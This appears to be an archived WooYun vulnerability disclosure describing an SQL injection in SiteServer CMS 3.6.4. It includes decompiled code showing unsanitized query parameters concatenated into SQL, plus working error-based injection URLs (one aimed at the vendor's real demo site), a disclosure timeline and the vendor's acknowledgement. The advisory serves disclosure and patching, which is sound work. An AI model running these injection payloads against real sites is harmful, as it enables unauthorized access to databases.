乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-26: 细节已通知厂商并且等待厂商处理中 2013-11-27: 厂商已经确认,细节仅向厂商公开 2013-11-30: 细节向第三方安全合作伙伴开放 2014-01-21: 细节向核心白帽子及相关领域专家公开 2014-01-31: 细节向普通白帽子公开 2014-02-10: 细节向实习白帽子公开 2014-02-24: 细节向公众公开
siteserver 最新版3.6.4 存在注入, 第12个注入
第11个注入存在/siteserver/cms/console_logSite.aspx用.NET Reflector 反编译SiteServer.CMS.dll这个文件查看代码如下:
public void Page_Load(object sender, EventArgs E){ int num; Exception exception; bool isPostBack; int publishmentSystemID; this.spContents.ControlToPaginate = this.rptContents; if ((((uint) num) + ((uint) num)) >= 0) { this.spContents.ItemsPerPage = 0x19; this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString; isPostBack = base.Request.QueryString["UserName"] != null; if (!isPostBack) { this.spContents.SelectCommand = DataProvider.LogDAO.GetSelectCommend(); } else { this.spContents.SelectCommand = DataProvider.LogDAO.GetSelectCommend(base.PublishmentSystemID, base.Request.QueryString["LogType"], base.Request.QueryString["UserName"], base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]); } this.spContents.SortField = "ID"; this.spContents.SortMode = SortMode.DESC; goto Label_068A; }
上面几个参数进入下面
public string GetSelectCommend(int publishmentSystemID, string logType, string userName, string keyword, string dateFrom, string dateTo){ // This item is obfuscated and can not be translated. StringBuilder builder; bool flag; bool flag2; if (publishmentSystemID != 0) { goto Label_0475; } while (!string.IsNullOrEmpty(logType)) { if (!StringUtils.EqualsIgnoreCase(logType, "All")) { goto Label_0475; } if (3 == 0) { goto Label_0016; } if (((uint) publishmentSystemID) >= 0) { break; } } if (!string.IsNullOrEmpty(userName) || !string.IsNullOrEmpty(keyword)) { goto Label_0475; } goto Label_046C;Label_0010: if (!flag2) { goto Label_013D; }Label_0016: return ("SELECT ID, PublishmentSystemID, ChannelID, ContentID, UserName, IPAddress, AddDate, Action, Summary FROM siteserver_Log " + builder.ToString());......Label_02C8: flag = true; builder.AppendFormat("(UserName = '{0}')", userName);Label_02DD: flag2 = string.IsNullOrEmpty(keyword); goto Label_029C;}
几个Request.QueryString['xxx']都是可注入点
http://www.target.com/siteserver/cms/console_logSite.aspx?UserName='%20and%201=@@version%20and%201='1&Keyword=&DateFrom=&DateTo=&PublishmentSystemID=0&LogType=All
官网
http://2012.moban.siteserver.cn/siteserver/cms/console_logSite.aspx?UserName='%20and%201=@@version%20and%201='1&Keyword=&DateFrom=&DateTo=&PublishmentSystemID=0&LogType=All
对那几个参数过滤
危害等级:中
漏洞Rank:10
确认时间:2013-11-27 09:31
感谢小新的工作,尽快修正产品
暂无